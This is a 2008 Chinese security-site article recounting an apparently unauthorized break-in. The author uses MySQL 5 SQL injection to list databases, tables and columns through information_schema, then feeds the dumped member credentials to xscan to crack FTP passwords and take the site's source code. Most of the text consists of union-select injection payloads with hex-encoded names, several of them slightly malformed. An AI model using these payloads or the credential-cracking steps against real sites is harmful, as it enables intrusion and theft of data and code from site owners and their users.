| 一次简单的入侵,权作Mysql5注射备份 |
|
| 作者:佚名 来源:安全在线
更新时间:2008-7-14 23:41:03 【字体:小
大】 |
|
<%=(int(rnd()*1)+1)%>您当前的位置:中国安全在线cnsafer.com 请进入[技术论坛]发表评论 找注射点,判断字段数就不提了。
判断下权限,非root连,没有load_file()的权限,不能select into outfile,幸好mysql版本是5.
获取库名
and 1=2 union select 1,2,3,database(),5....,87/*
或者
and 1=2 select SCHEMA_NAME from information_schema.SCHEMATA limit 0,1/*
and 1=2 select SCHEMA_NAME from information_schema.SCHEMATA limit 1,1/*
----------------------------------------------------------------------------------------------
获取表名:
数据库名转换成hex:admin=0x61646D696E
and 1=2 select TABLE_NAME from information_schema.TABLES%20where%20TABLE_SCHEMA=0x61646D696E%20limit 0,1/*
。。。依次往下爆
------------------------------------------------------------------------------------------------
获取字段值:
表 admin=0x61646D696E
and 1=2 select COLUMN_NAME from information_schema.COLUMNS%20where%20TABLE_NAME=0x61646D696E%20limit 0,1/*
---------------------------------------------------------------------------------------------------
爆出管理员帐号后,发现登录不了后台。于是又爆了10套member帐号。整理了下帐号和口令,扔xscan跑ftp口令,2分钟后拿到ftp权限。只是要源代码,到此收工。没技术含量!
您对本文章有什么意见或着疑问吗?请到论坛讨论您的关注和建议是我们前行的参考和动力 |
| 文章录入:ls1238 责任编辑:ls1238
|
|
上一篇文章: 菜鸟必备虚拟机安装详解
下一篇文章: 谈谈我拿WebShell的经验 |
| 【字体:小
大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】
|
网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)